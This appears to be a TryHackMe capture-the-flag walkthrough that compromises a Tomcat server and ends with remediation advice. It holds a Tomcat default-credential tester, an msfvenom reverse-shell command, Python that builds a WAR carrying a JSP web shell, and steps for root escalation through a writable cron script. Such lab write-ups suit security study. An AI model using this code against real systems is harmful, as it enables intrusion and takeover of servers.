TryHackMe Thompson
Let's start with an nmap scan of the target.
Port 8080 is open, so let's run the nmap vulners script against it to see which known vulnerabilities (and public exploits) are reported for the service version.
Trying one of the exploits returned by searchsploit fails.
Let's run dirsearch against the URL to enumerate directories.
If we browse to the site, there are login options off to the right.
If we click one of the buttons, such as Server Status, we are prompted for a login.
If we press cancel, we land on Tomcat's generic 401 unauthorized page. That page helpfully includes an example tomcat-users.xml entry for a user named tomcat with the password s3cret.
Let's try tomcat as the username and s3cret as the password and see if it lets us in.
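Default credentials on the manager are the first thing to check, and the check is easy to script. The following is an added example, not part of the original writeup: it tries a short constructed list of default Tomcat username/password pairs against /manager/html using HTTP Basic auth and reports the first pair that gets a 200. It includes a small mock of the manager endpoint (also constructed, accepting only tomcat/s3cret) so it runs offline; against the real target you would skip the mock and call check_tomcat_manager with http://<target>:8080.

```python
"""Try default Tomcat manager credentials over HTTP Basic auth.

Added example (not from the original writeup). DEFAULT_CREDS is a
constructed sample list; the mock manager at the bottom stands in for a
real Tomcat so the script runs offline and accepts only tomcat/s3cret.
Against a real target, skip the mock and call
check_tomcat_manager("http://<target>:8080").
"""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

MANAGER_PATH = "/manager/html"

# Constructed sample: pairs that show up in shipped/example tomcat-users.xml files.
DEFAULT_CREDS = [
    ("tomcat", "tomcat"),
    ("admin", "admin"),
    ("admin", ""),
    ("tomcat", "s3cret"),
]


def try_login(base_url, username, password, timeout=5):
    """Return the HTTP status of one Basic-auth request to the manager.

    Tomcat replies 401 for unknown credentials, 403 for a valid user without
    the manager-gui role, and 200 when the login grants access.
    """
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(base_url + MANAGER_PATH,
                                 headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def check_tomcat_manager(base_url, creds=DEFAULT_CREDS):
    """Return the first (username, password) that yields 200, or None."""
    for username, password in creds:
        if try_login(base_url, username, password) == 200:
            return (username, password)
    return None


class _MockManager(BaseHTTPRequestHandler):
    """Constructed stand-in for Tomcat's manager: only tomcat/s3cret gets 200."""
    VALID = "Basic " + base64.b64encode(b"tomcat:s3cret").decode()

    def do_GET(self):
        if self.path == MANAGER_PATH and self.headers.get("Authorization") == self.VALID:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Tomcat Web Application Manager")
            return
        # Real Tomcat answers with this realm; its 401 body even shows the
        # example tomcat-users.xml entry for tomcat/s3cret.
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the example quiet


def start_mock_manager():
    """Start the mock on a free localhost port; return (base_url, server)."""
    server = HTTPServer(("127.0.0.1", 0), _MockManager)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}", server


if __name__ == "__main__":
    url, srv = start_mock_manager()
    print("valid credentials:", check_tomcat_manager(url))
    srv.shutdown()
```

Keep the list short and the attempt count low on a real engagement: the manager has no lockout by default, but the 401s are logged, and a valid user that only lacks the role comes back as 403 rather than 401, which is itself worth noting.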
Now that we have valid credentials, we can launch Metasploit and look for a Tomcat manager exploit that uploads a malicious WAR file.
We will use the tomcat_mgr_upload exploit (exploit/multi/http/tomcat_mgr_upload).
We need to set our options: the target host and port, the credentials we just found, and our listener address.
Now let's set a suitable payload.
Run the exploit; once the session opens, use shell to drop to a system shell.
Now to find user.txt. Navigating to /home first, we find a user called jack.
Changing into jack's directory and listing its files, we find the user flag.
Let's cat out user.txt.
There is also a script, id.sh, in the same directory; let's cat it out as well.
Now let's see what cron jobs are running.
Now that we know there is a cron job running as root, and which file it runs, we can finish our privilege escalation: whatever ends up in that file is executed with root privileges on the job's next run.
Obtaining a User Shell without Metasploit
After logging into the Tomcat manager, click List Applications on the left.
Scroll down and we will see a WAR file to deploy upload option. We generate the WAR with msfvenom (replace tun0_ip with the IP of your VPN interface):
msfvenom -p java/shell_reverse_tcp lhost=tun0_ip lport=4321 -f war -o shell.war
Now upload the file, and start a netcat listener on the port we specified (4321).
Now click Deploy.
Now click the name of the application we just uploaded; that executes the payload and the shell connects back to our listener.
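Both the Metasploit module above and the manual upload here rely on the same fact: a WAR is just a zip archive, and Tomcat will compile and run any JSP it contains. The following added example (not from the original writeup, and not what msfvenom emits) builds a minimal WAR in Python whose JSP executes the cmd query parameter and returns the output, a web shell rather than the reverse shell msfvenom produces, together with a WEB-INF/web.xml welcome-file entry so that simply browsing to the deployed context runs it, which is what the "click the file name" step does. The context name shell, the JSP name cmd.jsp and the host in deploy_urls are assumptions.

```python
"""Build a minimal Tomcat WAR carrying a JSP web shell.

Added example (not from the original writeup and not msfvenom's output).
A WAR is an ordinary zip: this one holds WEB-INF/web.xml, whose welcome-file
points at the JSP, so requesting the deployed context path runs it.
The JSP executes the "cmd" query parameter and returns its output: a web
shell, unlike the reverse shell the writeup generates with msfvenom.
Context name "shell", JSP name "cmd.jsp" and the host in deploy_urls are
assumptions.
"""
import io
import zipfile

# Constructed JSP: runs ?cmd=... and streams the process output back.
CMD_JSP = """<%@ page import="java.io.*" %><%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    InputStream in = p.getInputStream();
    int c;
    while ((c = in.read()) != -1) out.print((char) c);
}
%>"""

# Deployment descriptor; the welcome-file makes GET /<context>/ execute the JSP.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list>
    <welcome-file>{jsp}</welcome-file>
  </welcome-file-list>
</web-app>
"""


def build_war(jsp_name="cmd.jsp", jsp_source=CMD_JSP):
    """Return the WAR bytes (a zip with web.xml and the JSP at the root)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def list_war(war_bytes):
    """Sorted member names of a WAR, to confirm the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def deploy_urls(base_url, context="shell", jsp_name="cmd.jsp"):
    """URLs involved once the WAR is deployed under /<context> (assumed names)."""
    return {
        # HTML manager form the writeup uses; needs the manager-gui role
        "gui_upload": f"{base_url}/manager/html",
        # text interface (PUT the WAR body here); needs the manager-script role
        "text_deploy": f"{base_url}/manager/text/deploy?path=/{context}&update=true",
        # the welcome-file makes this run the JSP (the "click the file name" step)
        "trigger": f"{base_url}/{context}/",
        # direct invocation with a command
        "run": f"{base_url}/{context}/{jsp_name}?cmd=id",
    }


if __name__ == "__main__":
    war = build_war()
    with open("shell.war", "wb") as fh:
        fh.write(war)
    print(list_war(war))
    print(deploy_urls("http://TARGET:8080")["trigger"])  # TARGET is a placeholder
```

One caveat worth knowing before reaching for curl instead of the browser: the HTML form the writeup uses is served to the manager-gui role, while the text interface (PUT to /manager/text/deploy) requires the manager-script role. If the account you found only carries manager-gui, a scripted upload to the text interface will be refused with 403 even though the GUI upload succeeds.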
It's always good to upgrade the shell if Python is installed on the machine. Running which python tells us whether it is.
Being able to cat files out isn't the best way to use root, so let's start another netcat listener and run a different command through the cron job so we get a root shell and can browse the system as needed.
Next we run the following command, then wait about 3 to 5 minutes for the cron job to fire.
After that we run another command.
After about another 3 to 5 minutes, we have a root shell.
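The cron enumeration earlier and the 3-to-5-minute waits here are two halves of the same finding: a job that cron runs as root executes a script that the low-privileged user can modify, so anything appended to that script runs as root on the next tick. The following is an added example, not part of the original writeup, that parses /etc/crontab-format text (a constructed sample, not the target's real crontab), resolves the paths each root job executes (including the cd DIR && script idiom), and reports those writable by the current user. demo() stages the scenario in a temporary directory with a constructed id.sh so it runs offline; the script contents and paths there are assumptions.

```python
"""Find root cron jobs whose script the current user can modify.

Added example (not from the original writeup). SAMPLE_CRONTAB is a
constructed /etc/crontab-format sample, not the target's real crontab;
demo() builds a temp directory standing in for a user's home. On a real
box, run writable_root_jobs(open("/etc/crontab").read()) and repeat for
the files under /etc/cron.d.
"""
import os
import re
import tempfile

SAMPLE_CRONTAB = """# constructed /etc/crontab sample
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot         root    /opt/startup/warm-cache.sh
*/5 *   * * *   www-data /var/www/cleanup.sh
"""

# System crontab line: five schedule fields (or one @keyword), user, command.
CRON_LINE = re.compile(
    r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$"
)


def parse_crontab(text):
    """Return (user, command) for each job line; skip comments and VAR= lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def referenced_paths(command):
    """Paths a cron command executes: absolute paths, plus *.sh/*.py names
    resolved against a leading 'cd DIR &&' (a common crontab idiom)."""
    cwd = None
    m = re.match(r"^cd\s+(\S+)\s*&&\s*(.*)$", command)
    if m:
        cwd, command = m.group(1), m.group(2)
    paths = []
    for tok in command.split():
        if tok.startswith("/"):
            paths.append(tok)
        elif cwd and tok.endswith((".sh", ".py")):
            paths.append(os.path.join(cwd, tok))
    return paths


def writable_root_jobs(crontab_text):
    """Return (command, path) for root jobs whose script the current user can
    write: anything appended to that file runs as root on the next tick."""
    hits = []
    for user, cmd in parse_crontab(crontab_text):
        if user != "root":
            continue
        for path in referenced_paths(cmd):
            if os.path.isfile(path) and os.access(path, os.W_OK):
                hits.append((cmd, path))
    return hits


def demo():
    """Constructed scenario: a root job running a script in a directory we own."""
    home = tempfile.mkdtemp(prefix="jack-")
    script = os.path.join(home, "id.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho placeholder\n")  # constructed stand-in content
    os.chmod(script, 0o755)
    crontab = f"*  *    * * *   root    cd {home} && bash id.sh\n"
    return writable_root_jobs(crontab)


if __name__ == "__main__":
    for cmd, path in demo():
        print(f"root job '{cmd}' runs writable script {path}")
```

On a real box, feed it /etc/crontab and the files under /etc/cron.d, and look at the per-user spool under /var/spool/cron if it is readable. A schedule of once a minute or once every five minutes is exactly why the writeup waits a few minutes after each change: the appended command runs at the next tick, not immediately.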
Lessons Learned/Remediations:
1. Always keep your software up to date.
2. Do not use easy passwords that can be found in wordlists, such as default system passwords; in particular, do not leave example accounts like tomcat/s3cret enabled.
3. Do not expose the Tomcat manager application, since it has administrative capabilities: remove it if it is not needed, or restrict it to trusted addresses.